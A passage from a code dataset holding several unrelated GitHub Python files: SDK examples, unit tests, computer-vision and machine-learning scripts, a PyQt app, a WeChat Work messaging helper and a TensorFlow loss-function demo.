\"dependsOn\": None,\n # \"pipeLineStatus\": \"RUNNING\"\n # }\n # }\n\n # print(app.last_response().original_result()) # get raw result\n # print(app.last_response()) # get response handler\n\nexcept HttpException as e:\n print(\"Http Exception\\nMessage : {}\\nStatus Code : {}\\n\".format(e.message, e.status_code))\n # print(e.response_handler)\nexcept SakkuException as e:\n print(\"Sakku Exception\\nMessage : {}\".format(e.message))\n","repo_name":"FanapSoft/sakku-python-sdk","sub_path":"examples/application/12_get_app_setting.py","file_name":"12_get_app_setting.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12536182011","text":"import pytest\nfrom google.cloud.firestore_v1 import GeoPoint\n\nfrom brevet_top_gcp_utils import route_point_to_firestore\nfrom brevet_top_plot_a_route import RoutePoint\n\n\n@pytest.mark.parametrize(\n (\"point\", \"result\"),\n [\n (\n RoutePoint(lat=1, lng=2),\n {\n \"coordinates\": GeoPoint(latitude=1, longitude=2),\n \"distance\": 0,\n },\n ),\n (\n RoutePoint(lat=3, lng=4, dir=\"CP1\", distance=123),\n {\n \"coordinates\": GeoPoint(latitude=3, longitude=4),\n \"distance\": 123,\n },\n ),\n ],\n)\ndef test_route_point_to_firestore(point: RoutePoint, result: dict):\n assert route_point_to_firestore(point) == result\n","repo_name":"grisxa/brevet-top-functions","sub_path":"brevet_top_gcp_utils/tests/test_route_point_to_firestore.py","file_name":"test_route_point_to_firestore.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70182790312","text":"#!/usr/bin/env python\n\"\"\"\"Core serialization tests.\"\"\"\nimport tempfile\nimport os\nimport cv2 as cv\nimport numpy as np\nfrom tests_common import NewOpenCVTests\n\n\nclass persistence_test(NewOpenCVTests):\n def test_yml_rw(self):\n fd, fname = tempfile.mkstemp(prefix=\"opencv_python_persistence_\", suffix=\".yml\")\n os.close(fd)\n\n # Writing ...\n expected = np.array([[[0, 1, 2, 3, 4]]])\n expected_str = (\"Hello\", \"World\", \"!\")\n fs = cv.FileStorage(fname, cv.FILE_STORAGE_WRITE)\n fs.write(\"test\", expected)\n fs.write(\"strings\", expected_str)\n fs.release()\n\n # Reading ...\n fs = cv.FileStorage(fname, cv.FILE_STORAGE_READ)\n root = fs.getFirstTopLevelNode()\n self.assertEqual(root.name(), \"test\")\n\n test = fs.getNode(\"test\")\n self.assertEqual(test.empty(), False)\n self.assertEqual(test.name(), \"test\")\n self.assertEqual(test.type(), cv.FILE_NODE_MAP)\n self.assertEqual(test.isMap(), True)\n actual = test.mat()\n self.assertEqual(actual.shape, expected.shape)\n self.assertEqual(np.array_equal(expected, actual), True)\n\n strings = fs.getNode(\"strings\")\n self.assertEqual(strings.isSeq(), True)\n self.assertEqual(strings.size(), len(expected_str))\n self.assertEqual(all(strings.at(i).isString() for i in range(strings.size())), True)\n self.assertSequenceEqual([strings.at(i).string() for i in range(strings.size())], expected_str)\n fs.release()\n\n os.remove(fname)\n","repo_name":"joachimBurket/esp32-opencv","sub_path":"modules/python/test/test_persistence.py","file_name":"test_persistence.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"72"} +{"seq_id":"13110074683","text":"import cv2\nimport numpy as np\nimport time\nimport os\nimport HandTrackingMoudule as htm\n\n\n###########################\nbrushThickness = 5\neraserThickness = 50\n###########################\n\nfolderPath = \"Header\"\nmyList = os.listdir(folderPath)\n\n# print(myList)\n\noverlayList = []\n\nfor imPath in myList:\n image = cv2.imread(f'{folderPath}/{imPath}')\n overlayList.append(image)\n\n# print(len(overlayList))\nheader = overlayList[0]\ndrawColor = (255,255,255)\n\n\ncap = cv2.VideoCapture(0)\n# cap.set(3, 800)\n# cap.set(4, 600)\n\ndetector = htm.handDetector(detectionCon=0.85)\nxp, yp = 0, 0\n\nimgCanvas = np.zeros((480, 640, 3), np.uint8)\n\nwhile True:\n # ideal\n # 1. Import image\n _, img = cap.read()\n img = cv2.flip(img, 1) # 取消镜像\n\n # 2. Find hand landmarks\n img = detector.findHands(img,draw=False)\n lmList = detector.findPostion(img,draw=False)\n\n if len(lmList) != 0:\n\n # print(lmList)\n\n\n # tip of index and minddle fingers\n x1, y1 = lmList[8][1:] # 1: - one to end\n x2, y2 = lmList[12][1:] # 1: - one to end\n\n\n # 3. Check which fingers are up (index)\n\n fingers = detector.finersUp()\n # print(fingers)\n # 4. If selection mode - two fingers are up\n if fingers[1] and fingers[2]:\n xp, yp = 0, 0\n # cv2.rectangle(img, (x1, y1-15), (x2, y2+15), drawColor, cv2.FILLED)\n # print(\"Slection Mode\")\n # Cheking for the lick\n temh = 64\n if y1 < 64:\n if 190-temh < x1 < 190:\n header = overlayList[1]\n drawColor = (0,128,255)\n elif 321-temh < x1 < 321:\n header = overlayList[2]\n drawColor = (255,102,178)\n elif 450-temh < x1 < 450:\n header = overlayList[3]\n drawColor = (128, 255, 0)\n elif 515 < x1 < 620:\n header = overlayList[4]\n drawColor = (0, 0, 0)\n # brushThickness = eraserThickness\n cv2.rectangle(img, (x1, y1 - 15), (x2, y2 + 15), drawColor, cv2.FILLED)\n\n # 5. If Drawing Mode - index finger is up\n if fingers[1] and fingers[2] == False:\n cv2.circle(img, (x1, y1), 5,drawColor, cv2.FILLED)\n # print(\"Draw Mode\")\n if xp == 0 and yp == 0:\n xp, yp = x1, y1\n\n if drawColor == (0,0,0):\n cv2.line(img, (xp, yp), (x1, y1), drawColor, eraserThickness)\n cv2.line(imgCanvas, (xp, yp), (x1, y1), drawColor, eraserThickness)\n else:\n cv2.line(img, (xp,yp), (x1, y1), drawColor, brushThickness)\n cv2.line(imgCanvas, (xp,yp), (x1, y1), drawColor, brushThickness)\n\n xp, yp = x1, y1\n imgGray = cv2.cvtColor(imgCanvas, cv2.COLOR_BGR2GRAY)\n _, imgInv = cv2.threshold(imgGray, 50, 255, cv2.THRESH_BINARY_INV)\n imgInv = cv2.cvtColor(imgInv, cv2.COLOR_GRAY2BGR)\n img = cv2.bitwise_and(img, imgInv)\n img = cv2.bitwise_or(img, imgCanvas)\n\n # setting the header image\n h,w,c=header.shape\n img[0:h,0:w] = header # img[h, w]\n # img = cv2.addWeighted(img, 0.5, imgCanvas, 0.5, 0)\n cv2.imshow(\"Painting\", img)\n # cv2.imshow(\"imgCanvas\", imgCanvas)\n # cv2.imshow(\"imgIvc\", imgInv)\n cv2.waitKey(1)\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"tianxingithub/Advanced-Computer-Vision-with-Python-Projects","sub_path":"VitualPaintingProject/VirtualPainter.py","file_name":"VirtualPainter.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21406949366","text":"#import from training dir\r\nfrom networks.networks import VisionNetwork, PlanRecognitionNetwork, PlanProposalNetwork\r\nfrom networks.logistic_policy_network import LogisticPolicyNetwork\r\nfrom networks.action_decoder_network import ActionDecoderNetwork\r\nimport torch\r\nimport os\r\nimport numpy as np\r\nimport torch.optim as optim\r\nimport torch.distributions as D\r\nfrom torch.distributions.normal import Normal\r\nimport utils.plot as plot\r\n\r\nclass PlayLMP():\r\n def __init__(self, lr=2e-4, beta=0.01, num_mixtures=5, use_logistics=False):\r\n super(PlayLMP, self).__init__()\r\n self.plan_proposal = PlanProposalNetwork().cuda()\r\n self.plan_recognition = PlanRecognitionNetwork().cuda()\r\n self.vision = VisionNetwork().cuda()\r\n self.num_mixtures = num_mixtures\r\n self.use_logistics = use_logistics\r\n if use_logistics:\r\n self.action_decoder = LogisticPolicyNetwork(num_mixtures).cuda()\r\n else:\r\n self.action_decoder = ActionDecoderNetwork(num_mixtures).cuda()\r\n\r\n params = list(self.plan_proposal.parameters()) + list(self.plan_recognition.parameters()) \\\r\n + list(self.action_decoder.parameters()) + list(self.vision.parameters())\r\n self.optimizer = optim.Adam(params, lr=lr)\r\n self.beta = beta\r\n\r\n def train_mode(self):\r\n self.vision.train()\r\n self.plan_proposal.train()\r\n self.plan_recognition.train()\r\n self.action_decoder.train()\r\n\r\n def eval_mode(self):\r\n self.vision.eval()\r\n self.plan_proposal.eval()\r\n self.plan_recognition.eval()\r\n self.action_decoder.eval()\r\n\r\n def to_tensor(self, array):\r\n return torch.tensor(array, dtype=torch.float, device=\"cuda\")\r\n\r\n def get_pp_plan(self, obs, imgs):\r\n #obs = (batch_size, 9)\r\n #imgs = (batch_size, 2, 3, 300, 300)\r\n self.eval_mode()\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Proposal------------ #\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs, encoded_imgs[:,-1]], dim=-1)\r\n mu_p, sigma_p = self.plan_proposal(pp_input)#(batch, 256) each\r\n pp_dist = Normal(mu_p, sigma_p)\r\n sampled_plan = pp_dist.sample()\r\n return sampled_plan\r\n\r\n def get_pr_plan(self, obs, imgs):\r\n #inputs are np arrays\r\n #obs = (batch_size, seq_len, 9)\r\n #imgs = (batch_size, seq_len , 3, 300, 300)\r\n self.eval_mode()\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Recognition------------ #\r\n #plan recognition input = visuo_proprio = (batch_size, sequence_length, 73)\r\n obs = self.to_tensor(obs)\r\n pr_input = torch.cat([encoded_imgs, obs], dim=-1)\r\n mu_p, sigma_p = self.plan_recognition(pr_input)#(batch, 256) each\r\n pr_dist = Normal(mu_p, sigma_p)\r\n sampled_plan = pr_dist.sample()\r\n return sampled_plan\r\n\r\n #Forward + loss + backward\r\n def step(self, obs, imgs, acts):\r\n self.train_mode()\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w) #(batch_size * sequence_length, 3, 300, 300)\r\n\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs) #(batch*seq_len, 64)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1) #(batch, seq, 64)\r\n\r\n # ------------Plan Proposal------------ #\r\n #plan proposal input = cat(visuo_proprio, goals) = (batch, 137)\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs[:,0], encoded_imgs[:,-1]], dim=-1)\r\n mu_p, sigma_p = self.plan_proposal(pp_input)#(batch, 256) each\r\n pp_dist = Normal(mu_p, sigma_p)\r\n\r\n # ------------Plan Recognition------------ #\r\n #plan proposal input = visuo_proprio = (batch_size, sequence_length, 73)\r\n pr_input = torch.cat([encoded_imgs, obs], dim=-1)\r\n mu_r, sigma_r = self.plan_recognition(pr_input)#(batch, 256) each\r\n pr_dist = Normal(mu_r, sigma_r)\r\n\r\n # ------------ Policy network ------------ #\r\n sampled_plan = pr_dist.rsample() #sample from recognition net\r\n #action_input = torch.cat([pp_input, sampled_plan], dim=-1).unsqueeze(1)\r\n goal_plan = torch.cat([encoded_imgs[:,-1], sampled_plan], dim=-1) #b, 64 + 256\r\n goal_plan = goal_plan.unsqueeze(1).expand(-1, s, -1) #b, s, 64 + 256\r\n action_input = torch.cat([pr_input, goal_plan], dim=-1) #b, s, 64 + 9 + 64 + 256 (visuo-propio + goal + plan)\r\n \r\n pi, sigma, mu = self.action_decoder(action_input)\r\n acts = self.to_tensor(acts) # B, S, 9\r\n\r\n # ------------ Loss ------------ #\r\n kl_loss = D.kl_divergence(pr_dist, pp_dist).mean()\r\n mix_loss = self.action_decoder.loss(pi, sigma, mu, acts)\r\n total_loss = 1/s * mix_loss + self.beta * kl_loss \r\n\r\n # ------------ Backward pass ------------ #\r\n self.optimizer.zero_grad()\r\n total_loss.backward()\r\n self.optimizer.step()\r\n\r\n return total_loss, mix_loss, kl_loss\r\n\r\n #Evaluation in test set, no grad, no labels\r\n def predict(self, obs, imgs):\r\n self.eval_mode()\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Proposal------------ #\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs, encoded_imgs[:,-1]], dim=-1)\r\n mu_p, sigma_p = self.plan_proposal(pp_input)#(batch, 256) each\r\n pp_dist = Normal(mu_p, sigma_p)\r\n\r\n # ------------ Policy network ------------ #\r\n sampled_plan = pp_dist.sample() #sample from proposal net\r\n action_input = torch.cat([pp_input, sampled_plan], dim=-1).unsqueeze(1)\r\n pi, sigma, mu = self.action_decoder(action_input)\r\n action = self.action_decoder.sample(pi, sigma, mu)\r\n\r\n return action\r\n\r\n #Predict method to be able to compute val accuracy and error.\r\n #inputs: numpy arrays (Batch, seq_len, dim)\r\n def predict_eval(self, obs, imgs, act):\r\n self.eval_mode()\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Proposal------------ #\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs, encoded_imgs[:,-1]], dim=-1)\r\n mu_p, sigma_p = self.plan_proposal(pp_input)#(batch, 256) each\r\n pp_dist = Normal(mu_p, sigma_p)\r\n\r\n # ------------ Policy network ------------ #\r\n sampled_plan = pp_dist.sample() #sample from proposal net\r\n action_input = torch.cat([pp_input, sampled_plan], dim=-1).unsqueeze(1)\r\n pi, sigma, mu= self.action_decoder(action_input)\r\n action = self.action_decoder.sample(pi, sigma, mu)\r\n\r\n\r\n # ------------ Loss ------------ #\r\n #cannot compute KL_divergence, only return mixture loss\r\n action_labels = self.to_tensor(act).unsqueeze(1) \r\n mix_loss = self.action_decoder.loss(pi, sigma, mu, action_labels)\r\n\r\n # ------------ Accuracy ------------ #\r\n p_actions = action.cpu().detach().numpy().squeeze()\r\n accuracy = np.isclose(p_actions, act, atol=0.2)\r\n accuracy = np.mean(np.all(accuracy, axis=-1))\r\n return accuracy, mix_loss\r\n\r\n def predict_with_plan(self, obs, imgs, plan):\r\n with torch.no_grad():\r\n b, s, c, h, w = imgs.shape\r\n imgs = self.to_tensor(imgs).reshape(-1, c, h, w)\r\n # ------------ Vision Network ------------ #\r\n encoded_imgs = self.vision(imgs)\r\n encoded_imgs = encoded_imgs.reshape(b, s, -1)\r\n\r\n # ------------Plan Proposal------------ #\r\n obs = self.to_tensor(obs)\r\n pp_input = torch.cat([encoded_imgs[:, 0], obs, encoded_imgs[:,-1]], dim=-1)\r\n action_input = torch.cat([pp_input, plan], dim=-1).unsqueeze(1)\r\n pi, sigma, mu = self.action_decoder(action_input)\r\n action = self.action_decoder.sample(pi, sigma, mu)\r\n return action\r\n\r\n def save(self, file_name):\r\n torch.save({'plan_proposal': self.plan_proposal.state_dict(),\r\n 'plan_recognition' : self.plan_recognition.state_dict(),\r\n 'action_decoder' : self.action_decoder.state_dict(),\r\n 'vision' : self.vision.state_dict(),\r\n }, file_name)\r\n\r\n def load(self, file_name):\r\n if os.path.isfile(file_name):\r\n print(\"=> loading checkpoint... \")\r\n checkpoint = torch.load(file_name)\r\n self.plan_proposal.load_state_dict(checkpoint['plan_proposal'])\r\n self.plan_recognition.load_state_dict(checkpoint['plan_recognition'])\r\n self.action_decoder.load_state_dict(checkpoint['action_decoder'])\r\n self.vision.load_state_dict(checkpoint['vision'])\r\n print(\"done !\")\r\n else:\r\n print(\"no checkpoint found...\")\r\n","repo_name":"ErickRosete/Robot-Skills-from-Video","sub_path":"networks/play_lmp.py","file_name":"play_lmp.py","file_ext":"py","file_size_in_byte":10071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38705107345","text":"import sys\r\nimport time\r\nfrom PyQt5.Qt import *\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nimport juanzhou\r\nfrom read import readXML as rxml\r\nfrom sec import Ui_Child\r\nimport re\r\n\r\ninput_str=''\r\nrx = rxml()\r\n\r\n\r\nclass mainWindow(QMainWindow,juanzhou.Ui_MainWindow):\r\n # search_name='空值'\r\n def __init__(self ):\r\n QMainWindow.__init__(self)\r\n juanzhou.Ui_MainWindow.__init__(self)\r\n #主要界面\r\n self.setupUi(self)\r\n # #tip界面\r\n # self.setupUi2(self)\r\n # 设置窗口图标\r\n self.setWindowIcon(QIcon(\"res/app1.ico\"))\r\n # 设置窗口名\r\n self.setWindowTitle(\"健康卷轴\")\r\n #实时获取输入值,传递给查询按钮作为信号\r\n # self.lineEdit.textEdited[str].connect(self.onChange)\r\n # 查询的信号和槽\r\n # self.pushButton.clicked.connect(lambda :self.picChange(self.search_name))\r\n self.pushButton.clicked.connect(self.start)\r\n # self.detail.clicked.connect()\r\n # def onChange(self):\r\n # self.search_name = self.lineEdit.text()\r\n # print(self.search_name)\r\n\r\n\r\n\r\n\r\n def start(self):\r\n if self.lineEdit.text() ==\"\":\r\n rx.pic(\"qwer\")\r\n pix = QPixmap(\"效果图.png\")\r\n self.label_2.setPixmap(pix)\r\n else:\r\n input_str=self.lineEdit.text()\r\n rx.pic(input_str)\r\n pix = QPixmap(\"效果图.png\")\r\n self.label_2.setPixmap(pix)\r\n if rx.flag!=2:\r\n self.detail.raise_()\r\n self.detail.show()\r\n else:\r\n self.detail.hide()\r\n def l(self):\r\n\r\n self.label_2.setPixmap(QtGui.QPixmap(\"res/bg_1.png\"))\r\n # def picChange(self,search_name):\r\n # if search_name in search.keys():\r\n # num=search[search_name]\r\n # self.label_2.setPixmap(QPixmap(\"\"))\r\n # self.label_2.setStyleSheet(f\"background-image: url(res/bg_{num}.png);\\n\"\r\n # \" \")\r\n # # rx.pic(self.lineEdit.text())\r\n # # self.label_2.setStyleSheet(\"效果图.png\")\r\n # QApplication.processEvents()\r\n # time.sleep(1)\r\n\r\n\r\n\r\nclass Child(QMainWindow, Ui_Child):\r\n textList=[]\r\n def __init__(self):\r\n super(Child, self).__init__()\r\n self.setupUi(self)\r\n self.textList=[self.textBrowser, self.textBrowser_2,\r\n self.textBrowser_3, self.textBrowser_4, self.textBrowser_5, self.textBrowser_6,\r\n self.textBrowser_7,\r\n self.textBrowser_8, self.textBrowser_9, self.textBrowser_10, self.textBrowser_11,\r\n self.textBrowser_12]\r\n\r\n def open(self):\r\n a = 0\r\n print(rx.flag)\r\n self.show()\r\n if rx.flag == 0:\r\n print(rx.input_str)\r\n ma = rx.getMajor(rx.input_str)\r\n print(ma)\r\n rc = re.compile(\"\\d+、.*?\\n\")\r\n majors = re.findall(rc, ma)\r\n for major in majors:\r\n # self.textBrowser.setText(major)\r\n self.textList[a].setFontPointSize(16)\r\n # self.textList[a].setFontFamily(\"STXINGKA.TTF\")\r\n self.textList[a].setText(\"\"+major+\"\")\r\n a+=1\r\n if a==11:\r\n self.textBrowser_12.setFontPointSize(16)\r\n self.textBrowser_12.setText(\"...........\")\r\n break\r\n while a<=10:\r\n self.textList[a].setText(\"\")\r\n a+=1\r\n else:\r\n ns=rx.getNodeBySick(rx.input_str)\r\n ls=rx.getPrescription(rx.input_str)\r\n for n in ns:\r\n str=ls[a]\r\n self.textList[a].setText(\"\" +str+ \"\")\r\n # print(n.getAttribute('name'))\r\n # rx.getPrescription(rx.input_str)\r\n # self.textList[a].setText(\"\"+a+\"\")\r\n a += 1\r\n if a==len(ls):\r\n break\r\n elif a==11:\r\n self.textBrowser_12.setText(\"...........\")\r\n break\r\n while a<=10:\r\n self.textList[a].setText(\"\")\r\n a+=1\r\n\r\nif __name__=='__main__':\r\n app=QApplication(sys.argv)\r\n mw=mainWindow()\r\n ch=Child()\r\n movie = QtGui.QMovie(\"res/pc.gif\")\r\n mw.label_2.setMovie(movie)\r\n mw.show()\r\n movie.start()\r\n\r\n mw.detail.clicked.connect(ch.open)\r\n sys.exit(app.exec_())","repo_name":"Hush-Lee/health-scroll","sub_path":"venv/Include/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38861754025","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nbrowser = webdriver.Chrome()\n\nbrowser.get(\"https://techstepacademy.com/training-ground\")\n\ninput2_css_locator = \"input[id='ipt2']\"\nbutn4_xpath_locator = \"//button[@id='b4']\"\n\n# Assign elements\ninput1_elem = browser.find_element(By.CSS_SELECTOR, input2_css_locator)\nbutn4_elem = browser.find_element(By.XPATH, butn4_xpath_locator)\n\n# Manipulate elements\ninput1_elem.send_keys(\"Test text\")\nbutn4_elem.click()\n\n# Wait for 20 seconds\ntime.sleep(20)\nbrowser.quit()","repo_name":"dmshd/Python3_Drills","sub_path":"beautiful_browser_automation/beautiful_browser_automation/elements_exercise.py","file_name":"elements_exercise.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36963824440","text":"import data\nimport numpy as np\nimport ratings_plot\nimport matplotlib.pyplot as plt\n\ninputs = [data.listings_amenities,data.listings_accommodates,data.listings_bedrooms,data.listings_beds,data.listings_price]\ninputs,outputs = data.pop_nans(inputs,data.scores_value)\n\n#convert money to float\nfor i in inputs[4].keys():\n inputs[4][i] = float(inputs[4][i].strip(\"$\").replace(',', ''))\n if inputs[4][i] > 2000:\n inputs[4][i] = 181.8111094043352 #mean\n\n#Use number of amenities instead of amenities themselves\nfor i in inputs[0].keys():\n inputs[0][i] = inputs[0][i].count(',')\n\nratings_plot.plot_3d(inputs[2],inputs[4],outputs,\"#Bedrooms\",\"Price\",\"Value\",\"Value Rating vs Price & #Bedrooms\")\n\nX=np.column_stack((inputs[0]*inputs[4],inputs[1]*inputs[4],inputs[2]*inputs[4],inputs[3]*inputs[4]))\n\nfrom sklearn.linear_model import LinearRegression\n\nmodel = LinearRegression()\nmodel.fit(X, outputs)\n\nprint(model.intercept_)\nprint(model.coef_)","repo_name":"james-lunt/AirBnB-Rating-Predictor","sub_path":"value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7812353708","text":"import math\r\n\r\n\r\ndef isprime(n):\r\n for j in range(2, int(math.sqrt(n) + 1)):\r\n if n % j == 0:\r\n return False\r\n return True\r\n\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n while True:\r\n if n == 0 or n == 1:\r\n print(2)\r\n break\r\n if isprime(n):\r\n print(n)\r\n break\r\n n +=1","repo_name":"shotgun1107/coding-test","sub_path":"백준/Silver/4134. 다음 소수/다음 소수.py","file_name":"다음 소수.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17102153128","text":"#!/usr/bin/env python3\n# 企业微信自建APP发送消息。\n# 时间:2020-12-01\n\nimport requests\nimport sys\nimport os\nimport json\n\nclass WxWorkAPPError(RuntimeError):\n def __init__(self, arg):\n self.args = arg\n\n\nclass WxWorkAPP:\n # 企业ID\n corpid = ''\n\n # 自建APP密钥\n appsecret = ''\n\n # 自建APP的agentid\n agentid = 1000002\n\n def __init__(self):\n pass\n\n # 设置发送信息所需要的信息,如企业ID(_corpid),自建APP密钥(_appsecret),自建APP的agentid(_agentid)\n @classmethod\n def setsetting(self, _corpid, _appsecret, _agentid):\n self.corpid = _corpid\n self.appsecret = _appsecret\n self.agentid = _agentid\n\n # 发送消息,要发送的人员(ToUser),要发送的部门(ToParty),发送的消息(Message)。其中要发送的人员与要发送的部门必须有一个有效,消息不能为空。\n @classmethod\n def sendmessage(self, ToUser, ToParty, Message):\n # 获取accesstoken\n token_url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=' + self.corpid + '&corpsecret=' + self.appsecret\n req = requests.get(token_url)\n if(req.status_code != 200):\n raise WxWorkAPPError(\"WxWorkAPP Request AccessToken Error\")\n\n accesstoken_json=req.json();\n accesstoken=''\n if('access_token' in accesstoken_json):\n accesstoken = req.json()['access_token']\n else:\n raise WxWorkAPPError(\"wxWorkAPP Get AccessToken Error\")\n\n # 发送消息\n msgsend_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + accesstoken + '&debug=1'\n params = {\n \"touser\": ToUser,\n \"toparty\": ToParty,\n \"msgtype\": \"text\",\n \"agentid\": self.agentid,\n \"text\": {\n \"content\": Message\n },\n \"safe\": 0\n }\n req = requests.post(msgsend_url, data=json.dumps(params))\n if(req.status_code != 200):\n raise WxWorkAPPError(\"WxWorkAPP Request SendMessage Error\")\n ret = json.loads(req.text)\n if(ret['errcode'] != 0):\n raise WxWorkAPPError('WxWorkAPP SendMessage Error:'+req.text)\n","repo_name":"HEYAHONG/HYH_BlogAndNote","sub_path":"脚本相关/python脚本/使用企业微信自建应用API发送消息/WxWorkAPP/WxWorkAPP.py","file_name":"WxWorkAPP.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42246825908","text":"# -*- coding:utf-8 -*-\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n# only disables the AVX Warning\n\n#\n# 使用 Tensorflow 实现各种损失函数\n#\n#\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nsess = tf.Session()\n# 创建一个会话\n\n# first: 回归算法的损失函数\n\n# 创建预测序列和目标序列作为张量\nx_vals = tf.linspace(-1., 1., 500)\ntarget = tf.constant(0.)\n\n\n# 1. L2正则损失函数(欧拉损失函数)\nl2_y_vals = tf.square(target - x_vals)\nl2_y_out = sess.run(l2_y_vals)\n\n# same as (t1-x1)^2 + .... +(tn-xn)^2\n# Tensorflow内建L2正则形式,nn.l2_loss() = 1/2 * l2_y_vals\n\n\n# 2. L1正则损失函数(绝对值损失函数)\nl1_y_vals = tf.abs(target - x_vals)\nl1_y_out = sess.run(l1_y_vals)\n# same as |t1-x1| + .... +|tn-xn|\n\n\n# 3.Pseudo-Huber 损失函数\ndelta1 = tf.constant(0.25)\nphuber1_y_vals = tf.multiply(tf.square(delta1), tf.sqrt(1. + tf.square((target - x_vals)/delta1)) - 1.)\nphuber1_y_out = sess.run(phuber1_y_vals)\n\ndelta2 = tf.constant(5.)\nphuber2_y_vals = tf.multiply(tf.square(delta2), tf.sqrt(1. + tf.square((target - x_vals)/delta2)) - 1.)\nphuber2_y_out = sess.run(phuber2_y_vals)\n\n\nx_vals = tf.linspace(-3., 5., 500)\ntarget = tf.constant(1.)\n# targets = tf.fill([500,], 1.)\n\n\n# 4.Hinge损失函数\nhinge_y_vals = tf.maximum(0., 1. - tf.multiply(target, x_vals))\nhinge_y_out = sess.run(hinge_y_vals)\n# 主要用来评估支持向量机算法\n# 上述算法使目标值为1,预测值距离1越近,损失函数值越小\n\n\n\n# 5.Cross-entropy loss 两类交叉熵损失函数(逻辑损失函数)\nxentropy_y_vals = - tf.multiply(target, tf.log(x_vals)) - tf.multiply((1. - target), tf.log(1. - x_vals))\nxentropy_y_out = sess.run(xentropy_y_vals)\n# same as -(t * log(x)) - [(1 - t) * log(1 - x)]\n\n\n# x_vals = tf.linspace(-3., 5., 500)\n# target = tf.constant(1.)\ntargets = tf.fill([500,], 1.)\n\n# 6.Sigmoid交叉熵损失函数\nxentropy_sigmoid_vals = tf.nn.sigmoid_cross_entropy_with_logits(logits=x_vals, labels=targets)\nxentropy_sigmoid_out = sess.run(xentropy_sigmoid_vals)\n# 先将x_vals值通过sigmoid函数转换,再计算交叉熵损失\n\n\n# 7.加权交叉熵损失函数(Weighted cross entropy loss)\nweight = tf.constant(0.5)\nxentropy_weighted_y_vals = tf.nn.weighted_cross_entropy_with_logits(targets, x_vals, weight)\nxentropy_weighted_y_out = sess.run(xentropy_weighted_y_vals)\n# 是Sigmoid交叉熵损失函数 的加权,对正目标加权\n\n\n# 8.Softmax交叉熵损失函数(Softmax cross entropy loss)\nunscaled_logits = tf.constant([[1., -3., 10.]])\ntarget_dist = tf.constant([[0.1, 0.02, 0.88]])\nsoftmax_xentropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=unscaled_logits, logits=target_dist)\nprint(sess.run(softmax_xentropy))\n\n# 只针对单个目标分类计算损失,通过 softmax 函数将输出结果转化成概率分布\n\n\n# 9.稀疏Softmax 交叉熵损失函数\nunscaled_logits = tf.constant([[1., -3., 10.]])\nsparse_target_dist = tf.constant([2])\nsparse_xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=unscaled_logits, labels=sparse_target_dist)\nprint(sess.run(sparse_xentropy))\n# 把目标分类为true 转化成 index\n\n\n\nprint('----------------------')\n\n# 使用 matplotlib 绘制回归算法的损失函数\n\n# part1\n\n# x_array = sess.run(x_vals)\n# plt.plot(x_array, l2_y_out, 